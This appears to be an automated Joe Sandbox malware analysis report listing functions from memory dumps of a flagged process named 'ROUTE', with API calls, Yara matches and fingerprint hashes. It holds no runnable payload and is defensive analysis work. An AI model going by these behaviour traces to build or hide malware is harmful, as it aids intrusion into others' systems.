                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 8ad6877beac453d9ab426cdfeddb5f994911afae7c24e3328f4196c538f527d5
                                                                                                                            • Instruction ID: 8e94fcfbabbd82a1516aed08be5ab4782b57ec6678cae163631485d45592fa72
                                                                                                                            • Opcode Fuzzy Hash: 8ad6877beac453d9ab426cdfeddb5f994911afae7c24e3328f4196c538f527d5
                                                                                                                            • Instruction Fuzzy Hash: D1900229271404030149F55C064450B144597D7351395C015F1416990CC72189755325
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 47b08f16de1b7fab59002f9ed3c110ea6462c4044ca3eb801ddac04acc9022e1
                                                                                                                            • Instruction ID: fb5ad0d89f4247988c0b13f0c217d7973481923ccc3b8bc10d0c4b38f18f9ef4
                                                                                                                            • Opcode Fuzzy Hash: 47b08f16de1b7fab59002f9ed3c110ea6462c4044ca3eb801ddac04acc9022e1
                                                                                                                            • Instruction Fuzzy Hash: 3990043D37140403010DF55C07445071047C7D7351355C031F1015D50CD731CD715135
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 7d3fd3213c103bc18af3d394e12183339c99e05e7301d9de3b9f4f44e5d66a4c
                                                                                                                            • Instruction ID: 2941cdb1d04b367250fb8ac46d5243678fbdf1065c19676c71971d71d43bbd3b
                                                                                                                            • Opcode Fuzzy Hash: 7d3fd3213c103bc18af3d394e12183339c99e05e7301d9de3b9f4f44e5d66a4c
                                                                                                                            • Instruction Fuzzy Hash: 6F90026539140843D104B15C4454B061005C7E2301F55C015E1064954DC719CD62612A
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 7a1b215b61fd260587fdc8bb200a97a25c5e791d41f1eb834bbd255713a901f6
                                                                                                                            • Instruction ID: 058a6d856d8ae504850775f232697513940934bfae68b3fd172493e85957e257
                                                                                                                            • Opcode Fuzzy Hash: 7a1b215b61fd260587fdc8bb200a97a25c5e791d41f1eb834bbd255713a901f6
                                                                                                                            • Instruction Fuzzy Hash: E6900225651404434144B16C88849065005ABE2211755C121A0998950DC75989755669
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 21efd6717fa6fc4be7483942bd2b7369f25f6e9c19f357ddd6ce872aa7cab70f
                                                                                                                            • Instruction ID: d001b4b14583f872b2a20256c47af7807024128dae14262ed3c059d30b741321
                                                                                                                            • Opcode Fuzzy Hash: 21efd6717fa6fc4be7483942bd2b7369f25f6e9c19f357ddd6ce872aa7cab70f
                                                                                                                            • Instruction Fuzzy Hash: 30900225261C0443D204B56C4C54B07100587D1303F55C115A0154954CCB1589715525
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: c6e627ddbf7081ab907aa436689e239ba7d584451654118e87d74116310857af
                                                                                                                            • Instruction ID: dd755dd673d71c3b0ba3b7dc5aec8572395a430177807f2c333dfa21dfe87c73
                                                                                                                            • Opcode Fuzzy Hash: c6e627ddbf7081ab907aa436689e239ba7d584451654118e87d74116310857af
                                                                                                                            • Instruction Fuzzy Hash: 8F90022529545503D154B15C44446165005A7E1201F55C021A0814994DC75589656225

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 578 aa0dc0-aa0e2a call abb610 call abc020 call aa4570 call a91410 call ab1c70 589 aa0e4a-aa0e50 578->589 590 aa0e2c-aa0e3b PostThreadMessageW 578->590 590->589 591 aa0e3d-aa0e47 590->591 591->589
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(-4108694,00000111,00000000,00000000), ref: 00AA0E37
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostThread
                                                                                                                            • String ID: -4108694$-4108694
                                                                                                                            • API String ID: 1836367815-789369925
                                                                                                                            • Opcode ID: 630658a22188ba26b85cbe305afc29655713d8078256a20e6728a0127b82ae18
                                                                                                                            • Instruction ID: 0575365bc4c9b26c08e57fe948ef2f25895353703ce5dd056e7e4224bd261f7d
                                                                                                                            • Opcode Fuzzy Hash: 630658a22188ba26b85cbe305afc29655713d8078256a20e6728a0127b82ae18
                                                                                                                            • Instruction Fuzzy Hash: 7B01C4B1D4020C7EDB11ABE09C82DEF7B7CDF45794F048064FA0467141D6755E0647B1
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(000007D0), ref: 00AB3B7B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID: net.dll$wininet.dll
                                                                                                                            • API String ID: 3472027048-1269752229
                                                                                                                            • Opcode ID: a0f0c6cff8ab3ca3c32de5cee17bd92f0d0773a5a6ad7c69f6b3f814c6071469
                                                                                                                            • Instruction ID: e2dc4dd451d6d06667decc98aa5d0dbdceb045557fd0d4200c33e92e92dd9dba
                                                                                                                            • Opcode Fuzzy Hash: a0f0c6cff8ab3ca3c32de5cee17bd92f0d0773a5a6ad7c69f6b3f814c6071469
                                                                                                                            • Instruction Fuzzy Hash: AE3160B1A01205BBDB14DFA4C885FEABBBDFB88700F148519F51D5B246D7706A44CBA4
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeUninitialize
                                                                                                                            • String ID: @J7<
                                                                                                                            • API String ID: 3442037557-2016760708
                                                                                                                            • Opcode ID: 7a03beab84a75b1469b1daf4eb69f1a4a669412261217e290c4517e6c01e4ddc
                                                                                                                            • Instruction ID: de19033e21cd695887ea17225daa6687138a058d619d0fcdc8ea2e35259d6e96
                                                                                                                            • Opcode Fuzzy Hash: 7a03beab84a75b1469b1daf4eb69f1a4a669412261217e290c4517e6c01e4ddc
                                                                                                                            • Instruction Fuzzy Hash: 75315EB6A0020AAFDB14DFD8D8809EFB7B9FF88304F108559E505EB254D771EE058BA0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeUninitialize
                                                                                                                            • String ID: @J7<
                                                                                                                            • API String ID: 3442037557-2016760708
                                                                                                                            • Opcode ID: 599e94375fd12ecb97e2f4b8d1889a5c76f917e89a0409b6cc35ead2fb38b8ec
                                                                                                                            • Instruction ID: 28c07f21616f30abcabb12afbfae88b793814cc96cfd75efa911645c4e91a582
                                                                                                                            • Opcode Fuzzy Hash: 599e94375fd12ecb97e2f4b8d1889a5c76f917e89a0409b6cc35ead2fb38b8ec
                                                                                                                            • Instruction Fuzzy Hash: 7B315EB6A0020AAFDB14DFD8D8809EFB7B9FF88304B108559E505EB254D771EE058BA0
                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00AA45E2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID: axD3
                                                                                                                            • API String ID: 2234796835-3556351365
                                                                                                                            • Opcode ID: 878dfedd390b4e169c5c909b9aebd42986a9202124793dd2abb74fc700858bd0
                                                                                                                            • Instruction ID: e73c4b5c8a0bf54d2aef2a857df22d828ef08b9b0d0af6a73fea83f53d996699
                                                                                                                            • Opcode Fuzzy Hash: 878dfedd390b4e169c5c909b9aebd42986a9202124793dd2abb74fc700858bd0
                                                                                                                            • Instruction Fuzzy Hash: 2B1186B5D0060A6BE700CBA8CC01BDAB7B8DB89718F144228FD159B2C1E7B0E906C791
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00AA1D50,00AB7FCE,00AB568F,00AA1D13), ref: 00AA8193
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: a700d42c835ce2977903810198fec52443f9cf3e02a7cad405b17eeed7dfaeee
                                                                                                                            • Instruction ID: e30edf70917686ed1ddf81fb380544930d43ecd78e5e402d64f97a209b4a20c1
                                                                                                                            • Opcode Fuzzy Hash: a700d42c835ce2977903810198fec52443f9cf3e02a7cad405b17eeed7dfaeee
                                                                                                                            • Instruction Fuzzy Hash: D71106729443047FEB10EBA0CD4AFAA777C9B45310F044299F808AB1D3EBB9595487A5
                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00AA45E2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2234796835-0
                                                                                                                            • Opcode ID: 796422a0e03da6e05e870b9df345f99345e8cc58a3a3a3b03bc6c72230115a90
                                                                                                                            • Instruction ID: 7c780edfd1a3858a2f3dcecf27326aed2e69bf0c63346ea54a7b0d37116d93f3
                                                                                                                            • Opcode Fuzzy Hash: 796422a0e03da6e05e870b9df345f99345e8cc58a3a3a3b03bc6c72230115a90
                                                                                                                            • Instruction Fuzzy Hash: 1201CCB5E4020AABDB10DBE4DD42FDDB7B89B54308F004195B908A7282F671EA588B91
                                                                                                                            APIs
                                                                                                                            • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,00AA832E,00000010,?,?,?,00000044,?,00000010,00AA832E,?,00000000,?), ref: 00AB9943
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2186235152-0
                                                                                                                            • Opcode ID: 671fddae834eef9a986202feb47780fc4726c027dd2d673c94bd21dafe3b195e
                                                                                                                            • Instruction ID: 6a3e55a67e2a173dbb0bb73fd9d9b476ebd38133e6abf8214b8c591f3d5363b6
                                                                                                                            • Opcode Fuzzy Hash: 671fddae834eef9a986202feb47780fc4726c027dd2d673c94bd21dafe3b195e
                                                                                                                            • Instruction Fuzzy Hash: B001CCB2204108BBCB44DE89DC81EEB77ADAF8C714F018208BA09E3241DA30F8518BA4
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00A99DF5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: a00885ac3c91a2ed3eecabbd7396b270ed8e90709770fb43edf4f08bfa2c8301
                                                                                                                            • Instruction ID: 951ac85fc2775b2e3b9f35b563e0704731510cd6edab1faeeabbe42cfb2d4c2a
                                                                                                                            • Opcode Fuzzy Hash: a00885ac3c91a2ed3eecabbd7396b270ed8e90709770fb43edf4f08bfa2c8301
                                                                                                                            • Instruction Fuzzy Hash: 6AF0397338020436E62066A99D02FDBA69CCB85BA1F250425F60CEB282D992B91182E5
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00AA839C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: d2d9782d338baf92f7f6c86506228d20aff339c068052cd2d406c6ccabd55ddd
                                                                                                                            • Instruction ID: 4336af2337c5eacf7f8b2c2796033be5677a0dc4a3650c003b595a5e65a896d1
                                                                                                                            • Opcode Fuzzy Hash: d2d9782d338baf92f7f6c86506228d20aff339c068052cd2d406c6ccabd55ddd
                                                                                                                            • Instruction Fuzzy Hash: C5F0E9751502012ADF107B28CC46BB2B758AB56B20F544654F4449F1C3EBBAA8128360
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(00000104,?,00AB180C,?,?,00AB180C,?,00000104,?,00009D57), ref: 00AB983C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 8af235827bdae546ae595d1eb37e2a3b6d82698474d1be62dc12886f45d2914b
                                                                                                                            • Instruction ID: bc51d88214e09b9ed5b2fb5b457844efbd39e41ca553b33d8e042303b94692c6
                                                                                                                            • Opcode Fuzzy Hash: 8af235827bdae546ae595d1eb37e2a3b6d82698474d1be62dc12886f45d2914b
                                                                                                                            • Instruction Fuzzy Hash: 5FE065B66042047BDA20EE58DC41EEB77ACEFC8720F004408FA08A7242D671B8118BB8
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F845C700,00000007,00000000,00000004,00000000,00AA3DDB,000000F4), ref: 00AB988C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3298025750-0
                                                                                                                            • Opcode ID: dab1178799a105d25c6e3316018af06c701a3083eb78f3c61f33bb5845b2359f
                                                                                                                            • Instruction ID: 81959a5bdf6a07fc755b2c242aed1282a9adf85855d72aaa47a6bd45d4c9bf1b
                                                                                                                            • Opcode Fuzzy Hash: dab1178799a105d25c6e3316018af06c701a3083eb78f3c61f33bb5845b2359f
                                                                                                                            • Instruction Fuzzy Hash: 57E065B26042047BDA10EE58DC42FEB33ACEFC8710F004408FA08A7242D672B8108BB8
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00AA839C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: 05fb7c337f53ac48de3ae62af19cb0c17d93f744b11d69e0e8308fd602dbfd3e
                                                                                                                            • Instruction ID: e8d75fc6d7afaaaa84fd9e8ec6e0d55de9342d86dbeba2d9dc8dd31fc8d6ff8b
                                                                                                                            • Opcode Fuzzy Hash: 05fb7c337f53ac48de3ae62af19cb0c17d93f744b11d69e0e8308fd602dbfd3e
                                                                                                                            • Instruction Fuzzy Hash: 5EE0207114030437EB207768CC46FA63358EF46B60F544674B8189F1C3EA7AF91143A0
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00AA839C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AttributesFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3188754299-0
                                                                                                                            • Opcode ID: f9794e067ae3447b555326686bc9826f63314cf8011d7de037bd7b062c62e9e5
                                                                                                                            • Instruction ID: 5b01055c6c3bfdc02f5abd5546f6a5eb36bb5bd745421d42a66951f88487e040
                                                                                                                            • Opcode Fuzzy Hash: f9794e067ae3447b555326686bc9826f63314cf8011d7de037bd7b062c62e9e5
                                                                                                                            • Instruction Fuzzy Hash: 33E0807115020427EF247768DC45F66335C5F85B64F544664B91CDF1C2DA7DF9114260
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00AA1D50,00AB7FCE,00AB568F,00AA1D13), ref: 00AA8193
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 5030f345bf0ee70ff83990bab5f9a31eec18b2c10fa2af2b5d8427bb27453d03
                                                                                                                            • Instruction ID: b5da39db769b8ed1a3c27306146f4a29e32ea53c4dacbf3552d40a774c6f1bb7
                                                                                                                            • Opcode Fuzzy Hash: 5030f345bf0ee70ff83990bab5f9a31eec18b2c10fa2af2b5d8427bb27453d03
                                                                                                                            • Instruction Fuzzy Hash: 7AE086613C438637F740E7B09C46F567B985F82354F0C84E8F9489B2C3D995D11083A5
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00AA1D50,00AB7FCE,00AB568F,00AA1D13), ref: 00AA8193
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 66acfe115b10dd0cdfbbbef63d3d977e36db5f9dd7ea407bfb29fc943c5f1d26
                                                                                                                            • Instruction ID: 272f44f9e8def54f59514b9cc957d48c85e7e3da5e42098f14883c2908f1ee28
                                                                                                                            • Opcode Fuzzy Hash: 66acfe115b10dd0cdfbbbef63d3d977e36db5f9dd7ea407bfb29fc943c5f1d26
                                                                                                                            • Instruction Fuzzy Hash: 90D05EB12803063BF640B7A4CD07F56769C4B85794F088074BA0CEB2C3EDA6E51082A5
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: f5060dc80d748c3440066faa9ff2113ef688551ef39847efdd1cc21be37dc5d1
                                                                                                                            • Instruction ID: 0151644a66fc3e19f0fa9b337e5f62cda02ea2b151001e1233be6ca74a0b252a
                                                                                                                            • Opcode Fuzzy Hash: f5060dc80d748c3440066faa9ff2113ef688551ef39847efdd1cc21be37dc5d1
                                                                                                                            • Instruction Fuzzy Hash: D9B09B719415C5C6DA15E7644A4C717790467D1701F19C465D2034685E4739C1D1E275
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541270412.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_31a0000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: aeb201b127ed4eef0d0d2a6d72c58165ced946470ba6a8c2c3ec0c2fa56ca5bd
                                                                                                                            • Instruction ID: 703a22c4179971212cd693ae88a6ea98e3b4db4bbc97786b63e1b77350b908ca
                                                                                                                            • Opcode Fuzzy Hash: aeb201b127ed4eef0d0d2a6d72c58165ced946470ba6a8c2c3ec0c2fa56ca5bd
                                                                                                                            • Instruction Fuzzy Hash: 7141E679A18F0D4FD368EF6C9081276B3E2FB4D311F54062DC98AC7252EB74E8428785
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_a90000_ROUTE.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f30ed63e23de29af50ae00158a8f32c52e1f4d1c5ee98b1bb96a32c440ef3167
                                                                                                                            • Instruction ID: e1d539b71edb75d60b632f8a27bc54ed4e1cae7e0a19eaf953a5f89a937302bf
                                                                                                                            • Opcode Fuzzy Hash: f30ed63e23de29af50ae00158a8f32c52e1f4d1c5ee98b1bb96a32c440ef3167
                                                                                                                            • Instruction Fuzzy Hash: 72C08C33A681108AC634890DB8C16F4F7A4E347130F1037EAE888E7901D086C1A20159
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541270412.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_31a0000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                            • API String ID: 0-3558027158
                                                                                                                            • Opcode ID: 6e578b878be74098917343d695d2a51f32c8d2ed80991d1ede1da86247c354e8
                                                                                                                            • Instruction ID: 8cc26af1d3b1798fad80c8808312b3d68ef35521ec1353209cf879c676dcba6e
